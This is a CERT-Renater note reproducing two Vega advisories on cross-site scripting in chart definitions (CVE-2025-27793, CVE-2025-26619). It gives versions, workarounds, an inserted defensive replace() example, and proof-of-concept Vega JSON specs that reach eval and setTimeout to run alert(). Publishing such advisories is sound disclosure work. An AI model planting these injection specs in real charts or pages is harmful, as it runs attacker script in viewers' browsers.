=====================================================================
CERT-Renater Information Note No. 2025/VULN184
_____________________________________________________________________

DATE : 28/03/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Vega versions prior to 5.32.0,
vega-functions versions prior to 5.17.0.
=====================================================================

https://github.com/vega/vega/security/advisories/GHSA-963h-3v39-3pqf
https://github.com/vega/vega/security/advisories/GHSA-rcw3-wmx7-cphr

_____________________________________________________________________

XSS via RegExp.prototype[@@replace]

Severity: Moderate
Published by hydrosquall as GHSA-963h-3v39-3pqf on Mar 27, 2025

Package: vega (npm)
  Affected versions: <= 5.31.0
  Patched versions:  5.32.0
Package: vega-functions (npm)
  Affected versions: <= 5.16.0
  Patched versions:  5.17.0

Description

Impact
Users running Vega/Vega-Lite JSON definitions could run unexpected
JavaScript code when drawing graphs, unless the library is used with
the vega-interpreter.

Workarounds
- Use vega with the expression interpreter.
- Upgrade to a newer Vega version (5.32.0).

POC Summary
Calling replace with a RegExp-like pattern calls
RegExp.prototype[@@replace], which can then call an attacker-controlled
exec function.

POC Details
Consider the function call
  replace('foo', {__proto__: /h/.constructor.prototype, global: false})
Since the pattern has RegExp.prototype[@@replace], pattern.exec('foo')
winds up being called. The resulting malicious call looks like this:
  replace(, {__proto__: /h/.constructor.prototype, exec: , global: false})
Since functions cannot be returned from this, an attacker that wishes to
escalate to XSS must abuse event.view to gain access to eval.
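The check below is an added illustration for this note, not vega's own code or its published fix: it shows how an expression-language replace() can refuse a pattern that merely inherits from RegExp.prototype, so the object's own exec is never reached through RegExp.prototype[@@replace]. It assumes Node.js; the function names and the constructed pattern are illustrative.

```javascript
// Added example (not vega's code): a pattern check that keeps an expression-
// language replace() from handing a RegExp-like object to String.prototype.replace,
// where the inherited RegExp.prototype[@@replace] would call the object's exec().
// Runs under Node.js with no dependencies; all names here are illustrative.

// The `source` getter on RegExp.prototype throws unless `this` carries the
// [[RegExpMatcher]] internal slot, i.e. is a genuine regular expression.
// An object literal with __proto__: RegExp.prototype passes `instanceof RegExp`
// but fails here. RegExp.prototype itself is special-cased by the getter.
const sourceGetter = Object.getOwnPropertyDescriptor(RegExp.prototype, 'source').get;

function isRealRegExp(value) {
  if (value === null || typeof value !== 'object' || value === RegExp.prototype) return false;
  try {
    sourceGetter.call(value);
    return true;
  } catch (e) {
    return false;
  }
}

// Hardened replace(): only string patterns and genuine RegExp instances without
// an own exec override are forwarded; anything else is rejected before
// String.prototype.replace can look up @@replace on it.
function safeReplace(str, pattern, replacement) {
  const ok = typeof pattern === 'string' ||
    (isRealRegExp(pattern) && !Object.prototype.hasOwnProperty.call(pattern, 'exec'));
  if (!ok) throw new TypeError('replace(): pattern must be a string or a RegExp');
  return String(str).replace(pattern, String(replacement));
}

// Constructed stand-in for the advisory's crafted pattern: exec() only records
// that it was invoked, so a reader can verify the hardened path never calls it.
const execCalls = [];
const craftedPattern = {
  __proto__: RegExp.prototype,
  global: false,
  exec(input) { execCalls.push(input); return null; },
};

function demo() {
  let rejected = false;
  try {
    safeReplace('foo', craftedPattern, 'x');
  } catch (e) {
    rejected = e instanceof TypeError;
  }
  return { rejected, execCalls: execCalls.length,
           realStillWorks: safeReplace('a-b', /-/g, '+') };
}
```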
Reproduction steps
  {
    "$schema": "https://vega.github.io/schema/vega/v5.json",
    "signals": [
      {
        "name": "a",
        "on": [
          {
            "events": "body:mousemove{99999}",
            "update": "replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"
          }
        ]
      }
    ]
  }

Severity: Moderate
CVE ID: CVE-2025-27793
Weaknesses: CWE-87

Credits
- @FallingPineapples (FallingPineapples): Reporter
- @hydrosquall (hydrosquall): Remediation developer
- @domoritz (domoritz): Remediation reviewer

_____________________________________________________________________

XSS in Vega via event filter when not using CSP mode `expressionInterpreter`

Severity: Moderate
Published by hydrosquall as GHSA-rcw3-wmx7-cphr on Mar 27, 2025

Package: vega (npm)
  Affected versions: <= 5.30.0
  Patched versions:  5.31.0
Package: vega-functions (npm)
  Affected versions: <= 5.15.0
  Patched versions:  5.16.0

Description

Impact
In vega 5.30.0 and lower and vega-functions 5.15.0 and lower, it was
possible to call JavaScript functions from the Vega expression language
that were not meant to be supported.

Patches
Patched in vega 5.31.0 / vega-functions 5.16.0.

Workarounds
Is there a way for users to fix or remediate the vulnerability without
upgrading? Run vega without vega.expressionInterpreter. This mode is not
the default as it is slower. Using the interpreter described in CSP safe
mode (Content Security Policy) prevents arbitrary JavaScript from
running, so users of this mode are not affected by this vulnerability.
References
Reported to Vega-Lite by @kprevas on Nov 8 2024 in vega/vega-lite#9469 & #3984.
Reproduction of the error in Vega by @mattijn:
  {
    "$schema": "https://vega.github.io/schema/vega/v5.json",
    "signals": [
      {
        "name": "inject_alert",
        "on": [
          {
            "events": [
              {
                "type": "mousedown",
                "marktype": "rect",
                "filter": ["scale(event.view.setTimeout, 'alert(\"alert\")')"]
              }
            ],
            "update": "datum"
          }
        ]
      }
    ],
    "marks": [
      {
        "type": "rect",
        "encode": {
          "update": {
            "x": {"value": 0},
            "y": {"value": 0},
            "width": {"value": 100},
            "height": {"value": 100}
          }
        }
      }
    ]
  }

Severity: Moderate
CVE ID: CVE-2025-26619
Weaknesses: CWE-79

Credits
- @kprevas (kprevas): Reporter
- @hydrosquall (hydrosquall): Remediation developer
- @domoritz (domoritz): Remediation reviewer
- @mattijn (mattijn): Other
- @lsh (lsh): Remediation reviewer

=========================================================
+ CERT-RENATER       | tel : 01-53-94-20-44            +
+ 23/25 Rue Daviel   | fax : 01-53-94-20-41            +
+ 75013 Paris        | email : cert@support.renater.fr +
=========================================================